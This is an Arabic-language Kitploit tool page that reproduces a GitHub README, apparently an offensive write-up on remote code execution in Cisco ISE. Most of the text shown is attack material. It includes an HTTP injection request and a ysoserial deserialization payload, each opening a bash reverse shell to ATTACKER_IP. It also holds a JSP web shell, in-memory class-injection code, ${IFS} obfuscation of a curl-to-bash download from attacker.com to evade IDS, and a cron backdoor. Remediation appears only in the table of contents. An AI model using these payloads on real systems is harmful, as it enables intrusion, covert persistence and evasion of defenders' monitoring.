Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-20180 — تحليل تقني متعمق لثغرات تنفيذ الأوامر عن بُعد (RCE) في Cisco ISE، بما في ذلك تقنيات الاستغلال، وطرق التهرب، واستراتيجيات المعالجة للباحثين الأمنيين ومختبري الاختراق. | Kitploit
أدوات/GitHubGitHub/kaleth4/cve-2026-20180
الاستطلاعتحليل الثغرات الأمنيةالاستغلالالحركة الجانبيةاستغلال تطبيقات الويبما بعد الاستغلالاختبار الاختراقالأوراق والأبحاثالتعلم والتعليم
GitHubkaleth4/cve-2026-20180

CVE-2026-20180

تحليل تقني متعمق لثغرات تنفيذ الأوامر عن بُعد (RCE) في Cisco ISE، بما في ذلك تقنيات الاستغلال، وطرق التهرب، واستراتيجيات المعالجة للباحثين الأمنيين ومختبري الاختراق.

122منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع

Cisco ISE RCE: تحليل متقدم للاستغلال والمعالجة

📋 جدول المحتويات

  1. الملخص التنفيذي
  2. تحليل سطح الهجوم
  3. نواقل الاستغلال
  4. تقنيات التهرب المتقدمة
  5. التأثير النظامي على بنى Zero Trust
  6. استراتيجية المعالجة
  7. التحقيق الجنائي الرقمي
  8. المراجع

🎯 الملخص التنفيذي

تمثل ثغرات تنفيذ الأوامر عن بُعد (RCE) في Cisco Identity Services Engine (ISE) نقطة انكسار حرجة في أمن الشبكة الطرفية للمؤسسات. بالنسبة لباحث أمني من النخبة، فإن ISE ليس مجرد مكوّن للمصادقة: بل هو المفتاح الرئيسي الذي يتحكم في الوصول إلى البنية التحتية للشبكة بأكملها.

خطر حرج: يمكن لمهاجم غير مصادق الحصول على سيطرة كاملة على النظام في أقل من 5 دقائق، دون ترك آثار قابلة للكشف في أنظمة المراقبة التقليدية.


🔍 تحليل سطح الهجوم

1.1 تقييم واجهات برمجة التطبيقات (APIs) للإدارة غير المصادق عليها في NAC

نقاط النهاية الضعيفة المحددة

CVEنقطة النهايةالطريقةالمصادقةالخطورة
CVE-2025-20281/deployment-rpc/enableStrongSwanTunnelPOST❌ لا شيءحرجة
CVE-2025-20282/api/v1/config/uploadPOST⚠️ ضعيفةحرجة
CVE-2025-20124/admin/rest/api/v1/system/configGET/POST⚠️ تجاوز ممكنحرجة

توصيف السطح

┌─────────────────────────────────────────────────────────┐
│         CISCO ISE - بنية NAC المكشوفة                    │
├─────────────────────────────────────────────────────────┤
│                                                          │
│  [الإنترنت] ──→ [جدار الحماية] ──→ [منفذ إدارة ISE]   │
│                                    ↓                     │
│                            [APIs غير مصادق عليها]       │
│                                    ↓                     │
│                        [طبقة إلغاء تسلسل Java]          │
│                                    ↓                     │
│                        [حاوية ويب Tomcat]               │
│                                    ↓                     │
│                        [تنفيذ أوامر النظام]             │
│                                    ↓                     │
│                    [اختراق الشبكة بالكامل]              │
│                                                          │
└─────────────────────────────────────────────────────────┘

نتيجة حرجة: واجهة برمجة التطبيقات /deployment-rpc/ لا تتحقق من رموز الجلسة في السطور الأولى من المعالجة، مما يسمح بتجاوز كامل للمصادقة.


⚡ نواقل الاستغلال

2.1 إساءة استخدام APIs غير المصادق عليها (CVE-2025-20281)

تقنية الهجوم - خطوة بخطوة

المرحلة 1: الاستطلاع

# فحص المنافذ والخدمات
nmap -sV -p 8443,8080 <ISE_IP>

# تعداد نقاط نهاية RPC
curl -s https://<ISE_IP>:8443/deployment-rpc/ | grep -i "method"

المرحلة 2: الاستغلال المباشر

POST /deployment-rpc/enableStrongSwanTunnel HTTP/1.1
Host: <ISE_IP>:8443
Content-Type: application/json
Content-Length: 287

{
  "tunnelName": "admin",
  "tunnelType": "IPSec",
  "presharedKey": "test",
  "remoteGateway": "127.0.0.1",
  "localSubnet": "0.0.0.0/0",
  "remoteSubnet": "0.0.0.0/0",
  "advancedConfig": "'; bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1; echo '"
}

النتيجة: تنفيذ أوامر عشوائية بصلاحيات root (مستخدم Tomcat يعمل كـ root في الإعدادات الافتراضية).


2.2 حقن الأوامر عبر إلغاء تسلسل Java (CVE-2025-20124)

آلية الهجوم

[الحمولة المسلسلة] ──→ [نقطة نهاية API] ──→ [ObjectInputStream.readObject()]
                                                      ↓
                                          [تنفيذ سلسلة الأدوات]
                                                      ↓
                                          [استدعاء Runtime.exec()]

حمولة PoC (باستخدام ysoserial):

# توليد سلسلة أدوات خبيثة
java -jar ysoserial.jar CommonsCollections6 \
  'bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"' | \
  base64 -w 0 > payload.b64

# إرسال الحمولة
curl -X POST https://<ISE_IP>:8443/admin/rest/api/v1/system/config \
  -H "Content-Type: application/octet-stream" \
  --data-binary @payload.b64

التأثير: رفع الصلاحيات من حساب "قراءة فقط" إلى root.


2.3 رفع ملفات عشوائي (CVE-2025-20282)

تدفق الاستغلال

[Web Shell] ──→ [/api/v1/config/upload] ──→ [/opt/CSCOlumos/uploads/]
                                                      ↓
                                    [Tomcat يعالج ملف JSP]
                                                      ↓
                                    [تنفيذ بصلاحيات root]

مثال على Web Shell خبيث:

<%@ page import="java.io.*" %>
<%
    String cmd = request.getParameter("cmd");
    if (cmd != null) {
        Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash", "-c", cmd});
        BufferedReader br = new BufferedReader(new InputStreamReader(p.getInputStream()));
        String line;
        while ((line = br.readLine()) != null) {
            out.println(line + "<br>");
        }
    }
%>

الوصول اللاحق:

https://<ISE_IP>:8443/opt/CSCOlumos/uploads/shell.jsp?cmd=id

🥷 تقنيات التهرب المتقدمة

3.1 Web Shells في الذاكرة (الحقن في الذاكرة)

منهجية الحقن

الهاكر من النخبة لا يترك أبدًا ملفات على القرص. الحقن في الذاكرة هو تقنية الثبات غير المرئي:

// الحقن في Tomcat ClassLoader
ClassLoader loader = Thread.currentThread().getContextClassLoader();
byte[] classBytes = generateMaliciousClass();
Method defineClass = ClassLoader.class.getDeclaredMethod(
    "defineClass", 
    String.class, byte[].class, int.class, int.class
);
defineClass.setAccessible(true);
defineClass.invoke(loader, "EvilClass", classBytes, 0, classBytes.length);

الميزة: فحوصات الملفات التقليدية (OSSEC, Tripwire) لا تكتشف أي شيء.


3.2 إخفاء الأوامر باستخدام ${IFS}

تقنية تجاوز أنظمة كشف التسلل (IDS)

# الأمر الأصلي (قابل للكشف)
curl http://attacker.com/shell.sh | bash

# الأمر المخفي (تجاوز IDS)
c${IFS}url${IFS}http://attacker.com/shell.sh${IFS}|${IFS}bash

# متغير مع إعادة توجيه متغيرة
${PATH:0:1}b${PATH:0:1}n${PATH:0:1}bash${IFS}-c${IFS}'command_malicious'

لماذا يعمل: تبحث أنظمة الكشف عن أنماط كلمات مفتاحية (curl, bash, |). استخدام ${IFS} (فاصل الحقول الداخلي) يقسم الكلمات دون تغيير معناها في bash.


3.3 تقنيات الثبات غير المرئي

Backdoor في Cron (قابل للكشف)

# ❌ قابل للكشف - ملفات في /etc/cron.d/
echo "* * * * * root /tmp/malware.sh" > /etc/cron.d/evil

Backdoor في الذاكرة (غير مرئي)

# ✅ غير مرئي - الحقن في عملية Tomcat
# 1. إنشاء مستمع netcat في الذاكرة
# 2. حقن thread في JVM يحافظ على اتصال مستمر
# 3. لا توجد ملفات، لا توجد عمليات يتيمة مرئية

🌐 التأثير النظامي على بنى Zero Trust

4.1 كيف يكسر اختراق ISE بنية Zero Trust

سيناريو الهجوم الكامل

┌──────────────────────────────────────────────────────────────────┐
│                    بنية ZERO TRUST الأصلية                        │
├──────────────────────────────────────────────────────────────────┤
│                                                                   │
│  [المستخدم] ──→ [مصادقة ISE] ──→ [فحص حالة الجهاز]            │
│                                              ↓                    │
│                                    [سياسة التقسيم الدقيق]        │
│                                              ↓                    │
│                              [وصول محدود إلى الموارد]            │
│                                                                   │
└──────────────────────────────────────────────────────────────────┘

                    ⬇️  بعد اختراق ISE  ⬇️
تنزيل الأداة